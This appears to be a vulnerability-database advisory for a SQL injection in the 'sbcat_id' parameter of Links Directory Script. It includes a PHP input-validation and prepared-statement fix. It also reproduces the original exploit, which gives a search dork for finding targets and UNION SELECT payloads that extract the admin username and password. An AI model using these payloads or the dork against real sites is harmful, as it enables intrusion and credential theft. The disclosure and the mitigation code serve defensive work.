vendor: Links Directory Script
by: IRCRASH (Dr.Crash)
CVSS: 5.5 (MEDIUM)
CWE: 89 (SQL Injection)
Product Name: Links Directory Script
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Links Directory Script SQL INJECTION

The vulnerability allows an attacker to inject SQL code into the "sbcat_id" parameter of the "searchresult.php" script in the Links Directory Script. By exploiting this vulnerability, an attacker can retrieve the admin username and password from the database.

Mitigation:

The vendor should sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks.
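
One way to apply this mitigation to the "sbcat_id" parameter, as an added example that is not the vendor's code or part of the original advisory. The table sblnk_links, its columns, and the function names are hypothetical, and an in-memory SQLite database stands in for the application's real database so the example runs offline.

```php
<?php
declare(strict_types=1);

// Accept sbcat_id only as a short string of digits; anything else yields null.
function parse_category_id(mixed $raw): ?int
{
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return null;
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

// Hypothetical table and column names. The bound placeholder keeps the
// value out of the SQL text, so it can never be parsed as SQL syntax.
function find_links(PDO $db, int $categoryId): array
{
    $stmt = $db->prepare('SELECT id, title, url FROM sblnk_links WHERE cat_id = :cat');
    $stmt->bindValue(':cat', $categoryId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed in-memory database with one sample row.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE sblnk_links (id INTEGER PRIMARY KEY, cat_id INTEGER, title TEXT, url TEXT)');
$db->exec("INSERT INTO sblnk_links (cat_id, title, url) VALUES (3, 'Example', 'http://example.com/')");

// Constructed inputs: a normal category id, then the URL-decoded string from the advisory.
$inputs = ['3', '999999 union/**/select/**/0,username,2,3/**/from/**/sblnk_admin/*'];
foreach ($inputs as $raw) {
    $id = parse_category_id($raw);
    if ($id === null) {
        // Refuse to query at all; a real handler would answer HTTP 400 and log the request.
        echo "rejected: sbcat_id is not a positive integer\n";
        continue;
    }
    echo count(find_links($db, $id)), " row(s) for category {$id}\n";
}
```

Validation and binding are independent layers: the integer check rejects the request early and gives a clean signal for logging, while the prepared statement protects the query even if a caller skips the check.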
Source

Exploit-DB raw data:

#####################################################################################
####                   Links Directory Script SQL INJECTION                      ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#Script Download : http://www.softbizscripts.com/                                   #
#DORK: "Powered by SoftbizScripts" "OUR SPONSORS"                                   #
#                                                                                   #
#####################################################################################
#                                                                                   #
#Injection Address : http://server.com/searchresult.php?sbcat_id=<SQL C0de>         #
#                                                                                   #
#SQL C0de For Find admin Username : 999999%20union/**/select/**/0,username,2,3/**/from/**/sblnk_admin/*
#SQL C0de For Find admin Password : 999999%20union/**/select/**/0,password,2,3/**/from/**/sblnk_admin/*
#                                                                                   #
#####################################################################################
#                                                                                   #
#Our site : Ircrash.com                                                             #
#                                                                                   #
#                                 TNX : GOD                                         #
#####################################################################################

# milw0rm.com [2007-11-11]